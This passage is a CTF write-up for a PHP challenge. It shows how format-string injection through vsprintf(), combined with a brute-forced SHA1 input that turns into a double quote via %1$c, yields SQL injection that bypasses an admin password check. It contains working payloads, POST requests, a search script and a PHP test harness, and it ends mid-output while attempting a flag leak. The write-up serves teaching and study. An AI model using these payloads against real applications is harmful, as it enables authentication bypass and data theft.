    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥\" OR 1=1;-- -"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

We can see that indeed the strtr() sanitisation of our string is killing the traditional SQL injection attempt dead in the water:

SELECT * FROM users
WHERE username = "admin🔥\" OR 1=1;-- -"
--                \__________________/
--                  └── This is all treated as a single string 😞
AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
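To see why the quote never closes the string, here is a rough Python model of the escaping step. It assumes the challenge's strtr() call maps " to \" and \ to \\ in a single pass, as the harness does; escape_username is a hypothetical helper name and not part of the challenge code.

```python
# Simplified model of the strtr() escaping applied to the username.
# str.translate() rewrites each input character exactly once, so a backslash
# introduced by the mapping itself is never escaped a second time.
ESCAPES = str.maketrans({'"': '\\"', '\\': '\\\\'})


def escape_username(username: str) -> str:
    """Backslash-escape double quotes and backslashes (hypothetical helper)."""
    return username.translate(ESCAPES)


if __name__ == "__main__":
    raw = 'admin\x80" OR 1=1;-- -'
    escaped = escape_username(raw)
    # repr() keeps the \x80 byte visible on any terminal.
    print(repr(escaped))
    # Every quote we supply arrives with a backslash in front of it,
    # so it cannot terminate the double-quoted SQL string.
    print('\\"' in escaped)
```

Under this model, any " we type ourselves is always neutralised, which is why the quote has to come from somewhere other than our literal input.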

And so it would seem that unless we know the administrator’s password, we cannot progress further.

Recall that the database setup script said:

CREATE TABLE IF NOT EXISTS users (
  username TEXT NOT NULL,
  password TEXT NOT NULL
);

INSERT INTO users VALUES ('admin', SHA1(RANDOM_BYTES(32)));

The admin user’s password is 32 random bytes (256 bits). This means that there are 2^256 (over 115 quattuorvigintillion) possible password values for the admin. There is no way we’re guessing it, and even if we could leak the admin’s password hash somehow, there is no way we’re cracking it.
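For a sense of scale, the arithmetic can be checked in a few lines of Python. The guessing rate below is a made-up figure chosen purely for illustration. The sketch also prints the size of the 160-bit SHA1 output space, since a colliding input for the stored hash would do just as well as the original bytes, and that is still hopelessly large.

```python
# Size of the space of 32-byte (256-bit) secrets, and of SHA1's 160-bit output.
keyspace = 2 ** 256
sha1_space = 2 ** 160

print(keyspace)
print(f"{len(str(keyspace))} decimal digits")
print(f"SHA1 output space has {len(str(sha1_space))} decimal digits")

# Hypothetical guessing rate, for illustration only: one trillion per second.
guesses_per_second = 10 ** 12
seconds_per_year = 60 * 60 * 24 * 365
years = sha1_space // (guesses_per_second * seconds_per_year)
print(f"roughly 10^{len(str(years)) - 1} years to walk the SHA1 space")
```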

And so there must be some other way of getting past this “username and password” check.

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is another opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you get past this username/password check? Keep in mind that we can use a character above or equal to \x80 to smuggle in some data after the username of “admin”.

Hints (Hover to reveal):

  • How does vsprintf() work?
  • What is the format string that vsprintf() is being called on? Do we have any control over it?
  • It seems like we do control part of the format string! Why? What can we do with it?
  • Is there anything you could bring to the party after the string “admin” that might cause vsprintf() to behave in an interesting way? Read the documentation for vsprintf() for inspiration.
  • The next spoiler is a spicy one, don’t reveal it until you’re ready! You can do this 💪
  • It looks like putting format string conversion specifications such as %s into the username causes vsprintf() to act in a strange way. What does the error mean? And is there any way to get around it? Remember, we can’t control the number of values that are being used as format string parameters. Read the documentation for vsprintf() very carefully.
  • It looks like we can use %1$s to explicitly reference the first parameter in the array of parameters. But %s probably won’t do us any good at achieving, say, injection of a " to break out of the double quoted string. The only item in the array of parameters is a SHA1 hash, which can only contain 0-9 and a-f. Is there some other format string conversion specification that, under the right circumstances, could inject a " into the double quoted username string, giving us SQL injection?

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

vsprintf(), format strings, and format string injections

It’s now time to dig into vsprintf(), format strings, and how the code is using them to do bad SQL query preparation.

vsprintf() is a function that takes a format string and an array of values, and interpolates the values into the format string as instructed by the “conversion specifications” contained within the format string.

The challenge code uses only one type of format string “conversion specification”: the %s conversion specification. Each time vsprintf() encounters a %s in the format string, it takes the next element of the values array and interpolates it as a string.

For example:

php > print_r(vsprintf("Hello, %s! My name is %s.\n",
                       array("world", "Justin")));
Hello, world! My name is Justin.

The first %s in Hello, %s! took the first element in the values array, world. And the second %s took the Justin.

Now, what’s crucial about the challenge’s password check is that it does the following:

function mysql_fquery($mysqli, $query, $params) {
  return mysqli_query($mysqli, vsprintf($query, $params));
}

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" '.
                    'AND password = "%s"', [$password]);

That is, it first uses string concatenation to directly inject $username into the query, and then it uses vsprintf() to interpolate $password in using the %s conversion specification. This means that we can use $username to bring our own format string conversion specifications to the party, achieving format string injection.

A naive attempt at this goes a bit wonky:

# php jazz-data-pipeline.php $'admin\x80 %s' password
username: admin🔥 %s
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd %s"]
result: SELECT * FROM users WHERE username = "admin🔥 %s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥 %s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥 %s"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]

Fatal error: Uncaught ValueError: The arguments array must contain
2 items, 1 given in /pwd/jazz-data-pipeline.php:9
Stack trace:
#0 /pwd/jazz-data-pipeline.php(9): vsprintf('SELECT * FROM u...', Array)
#1 /pwd/jazz-data-pipeline.php(16): my_vsprintf('SELECT * FROM u...', Array)
#2 /pwd/jazz-data-pipeline.php(45): mysql_fquery('SELECT * FROM u...', Array)
#3 {main}
  thrown in /pwd/jazz-data-pipeline.php on line 9

We get an error. This is because vsprintf() has been given a format string with two format string conversion specifications:

SELECT * FROM users WHERE username = "admin🔥 %s" AND password = "%s"
                                       one ───┘            two ───┘

But it has been given a values array with only one element:

["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]

vsprintf() can’t deal with this. When it sees the first %s it consumes an item (the only item) from the values array, and then when it sees the second %s, it notices that the values array has been exhausted and it cracks it, throwing an exception.
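The mismatch can be reproduced with a deliberately tiny Python model. It only understands %s and the literal %%, and the function names are hypothetical; it is a sketch of the counting behaviour described above, not a reimplementation of PHP's vsprintf().

```python
import re

# Tokens this toy model knows about: a literal "%%" or a sequential "%s".
TOKEN = re.compile(r"%%|%s")


def count_sequential_s(fmt: str) -> int:
    """Count %s specifications, treating %% as a literal percent sign."""
    return sum(1 for tok in TOKEN.findall(fmt) if tok == "%s")


def model_vsprintf_s(fmt: str, values: list) -> str:
    """Interpolate values into fmt, refusing to run out of arguments."""
    needed = count_sequential_s(fmt)
    if needed > len(values):
        raise ValueError(
            f"The arguments array must contain {needed} items, "
            f"{len(values)} given"
        )
    remaining = iter(values)
    return TOKEN.sub(
        lambda m: "%" if m.group() == "%%" else str(next(remaining)), fmt
    )


if __name__ == "__main__":
    injected = ('SELECT * FROM users WHERE username = "admin\x80 %s" '
                'AND password = "%s"')
    print(count_sequential_s(injected))
    try:
        model_vsprintf_s(injected, ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"])
    except ValueError as err:
        print(err)
```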

Our way forward is through the complex grammar regarding format string conversion specifications. Things can get a lot more complicated than simply %n where n is a format string specifier. The documentation shows that a format string conversion specification can look as wild as:

%[argnum$][flags][width][.precision]specifier

The feature of this grammar that is most immediately useful to us is the argnum part. Taking for example %n$m, where n is a number and m is a specifier, this is taken to mean “take the n’th element from the values array (as opposed to the next element) and format it using the m specifier”. For example, while %s takes the next item from the values array and uses it as a string, %1$s explicitly takes the first item from the values array and uses it as a string, and %1337$s takes the 1337th item from the values array and uses it as a string.

Regarding our error, we can’t cause there to be more than one item in the values array. But what we can do is use the %n$m pattern to have our injected format string conversion specification explicitly take the first item from the values array, rather than the next one. “First item” and “next item” happen to be the same (only) item in this case, but what’s interesting about a format string conversion specification being explicit about which item it wants from the values array is that it doesn’t cause the array cursor to be incremented. By explicitly asking for the first item from the array, we’re effectively leaving the item there for the second format string conversion specification to be able to grab!

For example:

php > print_r(vsprintf('Next item: %s, next item: %s',
                       array("one", "two")));
Next item: one, next item: two

php > print_r(vsprintf('Explicitly the first item: %1$s, next item: %s',
                       array("one", "two")));
Explicitly the first item: one, next item: one
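The cursor behaviour can be sketched in Python. This is a toy model that only understands %s and %N$s, written to mirror the two PHP examples above; model_vsprintf is a hypothetical name, and the real function handles far more than this.

```python
import re

# Matches "%s" or "%N$s"; group 1 holds N when an explicit argnum is given.
SPEC = re.compile(r"%(?:(\d+)\$)?s")


def model_vsprintf(fmt: str, values: list) -> str:
    """Toy model: explicit argnums read a value without moving the cursor."""
    cursor = 0

    def substitute(match: re.Match) -> str:
        nonlocal cursor
        argnum = match.group(1)
        if argnum is not None:
            # Explicit reference (1-based): the cursor is left untouched.
            return str(values[int(argnum) - 1])
        if cursor >= len(values):
            raise ValueError("ran out of values")
        value = values[cursor]
        cursor += 1
        return str(value)

    return SPEC.sub(substitute, fmt)


if __name__ == "__main__":
    print(model_vsprintf("Next item: %s, next item: %s", ["one", "two"]))
    print(model_vsprintf("Explicitly the first item: %1$s, next item: %s",
                         ["one", "two"]))
    # With a single value, %1$s and the trailing %s both read that value.
    print(model_vsprintf('username = "admin %1$s" AND password = "%s"',
                         ["hash"]))
```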

Giving this a go, we get:

# php jazz-data-pipeline.php $'admin\x80 %1$s' password
username: admin🔥 %1$s
password: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd %1$s"]
result: SELECT * FROM users WHERE username = "admin🔥 %1$s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥 %1$s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥 %1$s"
    AND password = "%s"
values: ["5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"]
result: SELECT * FROM users
    WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
    AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

We’ve managed to borrow the computed SHA1 hash of the password value and have it appear within the admin’s username:

SELECT *
FROM users
WHERE username = "admin🔥 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
AND password = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

Neat!

But how can it get us closer to bypassing the password check using, say, SQL injection?

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is another opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you use this format string injection to smuggle an unescaped " into the username part of the SQL query, achieving SQL injection? You’re going to need to use something other than the %s specifier to do this. Make sure you RTFM.

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Type juggling a hexadecimal string into an integer and then into a %c character

What we can do is use %c rather than %s, so that rather than bringing the entire SHA1 hash of the password into the username part of the query, we coerce it into some kind of single character on its way in. Given the right strategy, perhaps we could make that single character become ", giving us SQL injection?

PHP’s vsprintf() documentation says:

Specifier Description
c The argument is treated as an integer and presented as the character with that ASCII.

And so we can see that %c takes an integer parameter, and presents it as the ASCII character with the corresponding character code.

For example:

php > print_r(vsprintf("%c", array(0x41)));
A

The problem is, the only value in the parameters array of our vsprintf() call is a SHA1 hash represented as a string. It’s not an integer. And so we shouldn’t be able to use %c to borrow the SHA1 hash and have it give us a single %c character within the username part of the query.

php > print_r(vsprintf("%c", array("AAAA")));
php > print_r(vsprintf("%c", array("ABCD")));
php > print_r(vsprintf("%c", array("1337BEEF")));
9

Hold up. What’s happened here? The string “1337BEEF”, when used as a parameter for a c specifier, gave us the character “9”? How is it getting an integer value from “1337BEEF” and how is it then getting the ASCII character “9” from this integer?

php > print_r((int)"1337");
1337
php > print_r((int)"1337BEEF");
1337

Hmm. When PHP wants to squeeze an integer value out of the string “1337BEEF” (remember, %c takes its value as an integer) it’s using type juggling to do a best-effort translation of the string into an integer value. It juggles “1337” to 1337 which makes sense, but “1337BEEF” also becomes 1337. It seems as though as soon as PHP hits a non-numeric character, it says to itself “Well I suppose what we’ve found so far will have to do”.
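A rough Python model of the behaviour observed above: keep the leading run of decimal digits and fall back to 0 when there is none. It deliberately ignores signs, leading whitespace and exponent notation, which as far as I'm aware PHP's real conversion also honours, so treat leading_int as a hypothetical simplification.

```python
import re


def leading_int(text: str) -> int:
    """Return the integer formed by the leading decimal digits, else 0."""
    match = re.match(r"\d+", text)
    return int(match.group()) if match else 0


if __name__ == "__main__":
    for sample in ["1337", "1337BEEF", "AAAA", "ABCD"]:
        print(f"{sample!r} -> {leading_int(sample)}")
```

Under this model "AAAA" and "ABCD" both become 0, which would fit with the earlier %c calls printing nothing visible: character code 0 is a NUL byte.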

Going back to our vsprintf() which turns 1337BEEF into a character:

php > print_r(vsprintf("%c", array("1337BEEF")));
9

Or alternatively:

php > print_r(vsprintf("%c", array(1337)));
9

How is it getting the character “9” from the integer 1337?

Heading to the PHP interpreter source code, we can see that in the case of the c format specifier, php_formatted_print() explicitly casts the given integer to a C char:

(char) zval_get_long(tmp)

This has the effect of essentially doing a mod 256 on the given integer. Python tells us that indeed, 1337 mod 256 is the ASCII character code for “9”:

>>> 1337 % 256
57
>>> chr(1337 % 256)
'9'

And so we need to find a password value which, when hashed with SHA1, has some leading numeric characters followed by a non-numeric character. Those numeric characters, when taken as a decimal number and reduced mod 256, need to have a value equal to the character code of ". We should then be able to borrow that value using %c and smuggle a double quote into our username. This double quote won’t be affected by the strtr() that was done to our $username since our username itself only contains a %c format string conversion specification. And thus we can achieve SQL Injection. Right?

A challenge

STOP SCROLLING

If you haven’t solved the challenge yet, this is another challenge opportunity.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: Can you find a value which, when hashed with SHA1, fits the criteria to be able to be borrowed as a " using vsprintf()? Can you turn this into an SQL injection payload which bypasses the password authentication?

Hints (Hover to reveal):

  • When I’m seeking a value that hashes to a value that matches some criteria, I usually choose to script it up as a brute force search
  • I find that the easiest way to do this is to use Python, and to count upwards forever starting from 0. At each stage, hash the number as though it was a string, and see if it fits the criteria I’m seeking. If it does I’ve found a solution! Do this, find the magic character, and use it to achieve SQL injection which bypasses the password check.

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

The search

We wrote a small Python script to brute force an input string that satisfies our criteria:

#!/usr/bin/env python3
import itertools
import hashlib
import re


for i in itertools.count():
    v = str(i)
    h = hashlib.sha1(v.encode()).hexdigest()
    match = re.match(r"^(\d+)[^0-9]", h)
    if match:
        leading_digits = match.group(1)
        n = int(leading_digits)
        if n % 256 == ord('"'):
            print(f"Input: {v!r}")
            print(f"SHA1: {h}")
            break

% ./find_string.py
Input: '668'
SHA1: 34c66477519b949b09b45e131347c17b5822a30a

The string value “668” has a SHA1 hash which begins with the number 34, which is precisely the ASCII value of ".
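One caveat worth hedging against when filtering candidate hashes: my understanding is that PHP 7.1 and later respect scientific notation when converting numeric strings to integers, so a hash beginning 34e1... could be read as 340 rather than 34. That is an assumption about the target's PHP version rather than something the challenge states. A more conservative filter, sketched below with a hypothetical usable_for_quote helper, simply rejects any hash whose first letter after the digits is e. The hash found above starts 34c, so it is unaffected either way.

```python
import re

QUOTE = ord('"')  # 34


def usable_for_quote(hex_digest: str) -> bool:
    """Conservatively decide whether %c would turn this hash into a '"'."""
    match = re.match(r"(\d+)([a-f])", hex_digest)
    if match is None:
        # No leading digits, or digits all the way through: skip it.
        return False
    digits, first_letter = match.groups()
    if first_letter == "e":
        # Assumption: "34e1..." might be parsed as 34 x 10^1, so be cautious.
        return False
    return int(digits) % 256 == QUOTE


if __name__ == "__main__":
    found = "34c66477519b949b09b45e131347c17b5822a30a"
    print(usable_for_quote(found))
    print(usable_for_quote("34e1" + "0" * 36))
```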

Giving a username that contains the %1$c format string conversion specification, and a password of “668”, we get our " and thus our SQL injection!

(Note that I’ve added some commentary to the below output)

# php jazz-data-pipeline.php $'admin\x80%1$c OR 1=1;-- -' 668
username: admin🔥%1$c OR 1=1;-- -
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c OR 1=1;-- -"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c OR 1=1;-- -"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c OR 1=1;-- -"
                                      \_____________________/
                     all one string ───┘

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c OR 1=1;-- -"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
                      \______/\_____/\______________________________________________________________/
            a string ───┘      |      |
             sql injection! ───┘      |
                           ignored ───┘

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"

SELECT *
FROM users
WHERE username = "admin\x80" OR 1=1;-- -" AND password = "34c66477519b949b09b45e131347c17b5822a30a"
--                         └──── Double quote created by our %1$c

🥳

Sending this to the challenge confirms our achievement:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c+OR+1=1;--+-&password=668

HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Hello admin�ç OR 1=1;-- -, the server time is 2023-09-04 07:17:57
[... SNIP ...]

We’ve made it past the username check, and the username/password check.
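The request body above leaves the % of %1$c unencoded, which appears to rely on the server passing an invalid percent escape through untouched. A stricter way to build the same body is sketched below using Python's standard library. Nothing is sent anywhere; the sketch only prints the encoded form.

```python
from urllib.parse import urlencode

# The username must be bytes so that \x80 is sent as the single byte 0x80
# rather than as the two-byte UTF-8 encoding of U+0080.
username = b'admin\x80%1$c OR 1=1;-- -'
password = "668"

body = urlencode({"username": username, "password": password})
print(body)
```

Here the literal % becomes %25 and $ becomes %24, so the server-side decoding no longer depends on how lenient the parser is.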

We don’t even need the OR 1=1 bit. But note that we do still need for our username to begin with “admin” followed immediately by our magic truncating character, as even with this SQL injection technique for the second SQL query, we still need to satisfy the first query that was checking to see that our user seems to exist.

At this stage, the space after the SQL comment is up for grabs if we need to include any additional content.

Tidying the payload up and making use of this space gives us:

# php jazz-data-pipeline.php $'admin\x80%1$c;-- its free real estate' 668
username: admin🔥%1$c;-- its free real estate
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- its free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- its free real estate"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate" AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate" AND password = "34c66477519b949b09b45e131347c17b5822a30a"

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c;--+its+free+real+estate&password=668

HTTP/1.1 200 OK
[... SNIP ...]

[... SNIP ...]
Hello admin�ç;-- its free real estate, the server time is 2023-09-04 07:24:12
[... SNIP ...]

The final part - leaking the flag

So we can successfully authenticate as the admin user, with no need to know their unknowable and uncrackable password. All that’s left is to use our access to obtain the flag (he says optimistically).

After the password check, the final part of the code is as follows:

  $htmlsafe_username = htmlspecialchars($username,
                                        ENT_COMPAT | ENT_SUBSTITUTE);
  $greeting = $username === "admin" 
      ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
      : "Hello $htmlsafe_username, the server time is %s";

  $message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);
  
  fail:
}

Once the password check is satisfied, the code does the following:

  • It uses htmlspecialchars() to HTML-encode the given username using the ENT_COMPAT and ENT_SUBSTITUTE options
  • It prepares to print a greeting message that tells us the current server time. If our username was strictly equal to the string “admin”, this message also includes the flag from the environment.

We’re so close.

Regarding the options given to htmlspecialchars(), the documentation tells us that the default options are:

  • ENT_QUOTES - Will convert both double and single quotes.
  • ENT_SUBSTITUTE - Replace invalid code unit sequences with a Unicode Replacement Character U+FFFD (UTF-8) or &#xFFFD; (otherwise) instead of returning an empty string.
  • ENT_HTML401 - Handle code as HTML 4.01

While the options used in the challenge are:

  • ENT_COMPAT - Will convert double-quotes and leave single-quotes alone
  • ENT_SUBSTITUTE - Replace invalid code unit sequences with a Unicode Replacement Character U+FFFD (UTF-8) or &#xFFFD; (otherwise) instead of returning an empty string.

The key differences are that hashkitten has decided to have htmlspecialchars() not transform single quotes, only double quotes. He also decided to omit the directive to “handle code as HTML 4.01”. It can be useful to pay attention to details such as this, as any change to default behaviours could have been to avoid a situation that makes the challenge unsolvable. One of these changes was indeed necessary for the challenge to be solvable.

Regarding the greeting message that is printed, we can take the code:

$greeting = $username === "admin" 
    ? "Hello $htmlsafe_username, the server time is %s and the flag is %s"
    : "Hello $htmlsafe_username, the server time is %s";

$message = vsprintf($greeting, [date('Y-m-d H:i:s'), getenv('FLAG')]);

And rewrite it in a more verbose fashion as follows:

if ($username === "admin") {
    $message = vsprintf("Hello $htmlsafe_username, the server time is %s and the flag is %s",
                        [date('Y-m-d H:i:s'), getenv('FLAG')]);
} else {
    $message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                        [date('Y-m-d H:i:s'), getenv('FLAG')]);
}

In both cases, vsprintf() is being used to prepare the message, and in both cases, the parameters array has two items in it - the current datetime, and the value of the flag. However, only in the case that the user’s given username is strictly equal to (===) the string “admin” is there a format string that provides for the opportunity for both parameters to actually be used.

Seeing as to get to this point we need to have our username contain at least:

  • A %1$c format string conversion specification, to be able to achieve SQL injection; and thus
  • A character above or equal to \x80 to hide the format string conversion specification from the username check

Then there is absolutely no way that our given username could be strictly equal to the string “admin”.

And so we can cut out the $username === "admin" case, and simplify the remaining step in the challenge code to be:

$message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                    [date('Y-m-d H:i:s'), getenv('FLAG')]);

And we can update our harness as such:

<?php
function my_vsprintf($format, $values) {
  // Perform vsprintf() on a given format string and values array
  // Show our work as we go
    print_r("[+] vsprintf()\n");
    print_r("format string: $format\n");
    // Use json_encode() to get the array in one neat line.
    // Tell it to be prepared for the invalid UTF8 sequence.
    print_r("values: " . 
                json_encode($values, JSON_INVALID_UTF8_SUBSTITUTE) .
                "\n");
    $res = vsprintf($format, $values);
    print_r("result: $res\n\n");
    return $res;
}

function mysql_fquery($query, $params) {
    // Construct the SQL query and pretend to execute it
    $prepared_query = my_vsprintf($query, $params);
    print_r("[+] Do SQL Query\n");
    print_r($prepared_query . "\n\n");
    // We don't need to do the query, we're just monitoring the data flow
    //return mysqli_query($mysqli, $q);
}

// Get the username, escape its double quotes and backslashes
$username = $argv[1];
$username = strtr($username, ['"' => '\\"', '\\' => '\\\\']);
print_r("username: $username\n");

// Get the password, SHA1 it
$password = $argv[2];
$password = sha1($password);
print_r("password: $password\n\n");

mysql_fquery('SELECT * FROM users WHERE username = "%s"', [$username]);

// Stop if the username doesn't match our criteria:
//  * 'admi'   == bad
//  * 'admin'  == good
//  * 'adminX' == good if and only if X is a character >= 0x80
if (strpos($username, "admin") !== 0) {
  die("bad username!\n");
}
if (strlen($username) > 5 && ord(substr($username, 5, 1)) < 0x80) {
  die("bad username!\n");
}
mysql_fquery('SELECT * FROM users WHERE username = "'.$username.'" ' .
                 'AND password = "%s"', [$password]);

$htmlsafe_username = htmlspecialchars($username,
                                      ENT_COMPAT | ENT_SUBSTITUTE);
my_vsprintf("Hello $htmlsafe_username, the server time is %s",
            [date('Y-m-d H:i:s'), "DUCTF{dummy}"]);

This harness now simulates the entirety of the challenge (besides actually performing the SQL queries):

# php jazz-data-pipeline-full.php $'admin\x80%1$c;-- its free real estate' 668
username: admin🔥%1$c;-- its free real estate
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- its free real estate"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- its free real estate"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- its free real estate"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]
result: SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] Do SQL Query
SELECT * FROM users
    WHERE username = "admin🔥";-- its free real estate"
    AND password = "34c66477519b949b09b45e131347c17b5822a30a"

[+] vsprintf()
format string: Hello admin�%1$c;-- its free real estate, the server time is %s
values: ["2023-09-10 02:48:43","DUCTF{dummy}"]
result: Hello admin�;-- its free real estate, the server time is 2023-09-10 02:48:43

The final call to vsprintf() results in a string that matches the output we’re currently getting from the webapp, and so we can grind away at this harness until a flag falls out 🤞
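The webapp responses shown earlier had a ç sitting right after the replacement character. A likely explanation, offered as an inference rather than something the challenge source spells out: in the greeting, %1$c now points at the date string, whose leading digits are the year. The sketch below applies the same "leading digits, then mod 256" reasoning to a date; php_like_char is a hypothetical helper.

```python
import re


def php_like_char(value: str) -> bytes:
    """Model %c on a string: leading digits as an integer, reduced mod 256."""
    match = re.match(r"\d+", value)
    number = int(match.group()) if match else 0
    return bytes([number % 256])


if __name__ == "__main__":
    byte = php_like_char("2023-09-04 07:17:57")
    print(byte.hex())
    # Interpreted as Latin-1, this byte is the character seen in the response.
    print(byte.decode("latin-1"))
```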

An opportunity to explore

STOP SCROLLING

If you haven’t solved the challenge yet, this is an opportunity to explore.

If you continue reading before you try it for yourself, you may spoil the challenge.

Scroll carefully!

Challenge: How do you suppose we could trick this last chunk of code into baking a $message that includes the flag? What challenges might we have with this strategy?

Hints (Hover to reveal):

  • The code uses a ternary condition as a bit of code shorthand. The problem with this is that it’s only switching up the format string based on the value of $username. It’s not doing anything to the format string parameters. In the case of a $username of not strictly equal to “admin”, the format string parameters will contain an unused copy of the flag! Could this be interesting?
  • How could we cause the unused copy of the flag to become used? Give it a go. You should get an error, and the challenge we’ll be facing should become apparent 🙂

If you’re up for it, see if you can finish the challenge completely before you read on. This part was the crux of the challenge IMO. It took some lateral thinking, some trial and error, and probably some luck for us to see it pop off. If you’re keen to give it a go, good luck, and I’ll see you on the other side!

STOP SCROLLING

SPOILERS AHEAD

This is your last chance to stop scrolling!

Please sir, I want some more (format string conversion specifications)

It’s important to note that the final call to vsprintf() will always have the flag passed in as the second item in the values array. The thing is, when our username is not “admin”, it goes completely unused:

$message = vsprintf("Hello $htmlsafe_username, the server time is %s",
                    [date('Y-m-d H:i:s'), getenv('FLAG')]);
//                   └──── Used 😁        └──── Unused 😔

However, we mostly control $htmlsafe_username. It’s an HTML-encoded copy of our username! Our username looks like this right now:

admin🔥%1$c;-- its free real estate

And so what if we added a %s within it? We’d have our %1$c which will take the date parameter as a character, then we’d have our own %s which would “consume” the date parameter, then the final %s (in the message template) would give us our flag!

It would look something like this:

//                   /------ username -------\
$message = vsprintf('Hello admin\x80%1$c;-- %s, the server time is %s',
//                         takes the date ──┘    takes the flag? ──┘
                    [date('Y-m-d H:i:s'), getenv('FLAG')]);

Giving us:

php > print_r(vsprintf('Hello admin\x80%1$c;-- %s, the server time is %s',
                       [date('Y-m-d H:i:s'), "DUCTF{the_flag}"]));
Hello admin\x80;-- 2023-09-10 03:07:49, the server time is DUCTF{the_flag}

Looks like a reasonable strategy to me!

Being bold and sending it straight to the server gives us:

POST / HTTP/1.1
[... SNIP ...]

username=admin%80%1$c;--+%s&password=668

HTTP/1.0 500 Internal Server Error
[... SNIP ...]

Dang it.

Looking at our PHP error logs, we see:

web    | [Wed Sep 06 15:00:23.855962 2023] [php:error] [pid 21]
  [client 172.31.0.1:46430] PHP Fatal error:  Uncaught ValueError:
  The arguments array must contain 2 items, 1 given in
  /var/www/html/index.php:3\nStack trace:\n#0/var/www/html/index.php(3):
  vsprintf()\n#1 /var/www/html/index.php(16): mysql_fquery()\n#2
  {main}\n  thrown in /var/www/html/index.php on line 3,
  referer: http://172.31.0.3/

Hmm. Error on line 3, as called by line 16. Line 16 is:

$res = mysql_fquery($mysqli,
                    'SELECT * FROM users WHERE username = "'.$username.'" ' .
                        'AND password = "%s"',
                    [$password]);

Looks like sneaking in an extra %s has blown the preparation of the username/password query.

This is also the case if we run this in the context of our command-line harness:

# php ./jazz-data-pipeline-full.php $'admin\x80%1$c;-- %s' 668
username: admin🔥%1$c;-- %s
password: 34c66477519b949b09b45e131347c17b5822a30a

[+] vsprintf()
format string: SELECT * FROM users WHERE username = "%s"
values: ["admin\ufffd%1$c;-- %s"]
result: SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s"

[+] Do SQL Query
SELECT * FROM users WHERE username = "admin🔥%1$c;-- %s"

[+] vsprintf()
format string: SELECT * FROM users
    WHERE username = "admin🔥%1$c;-- %s"
    AND password = "%s"
values: ["34c66477519b949b09b45e131347c17b5822a30a"]

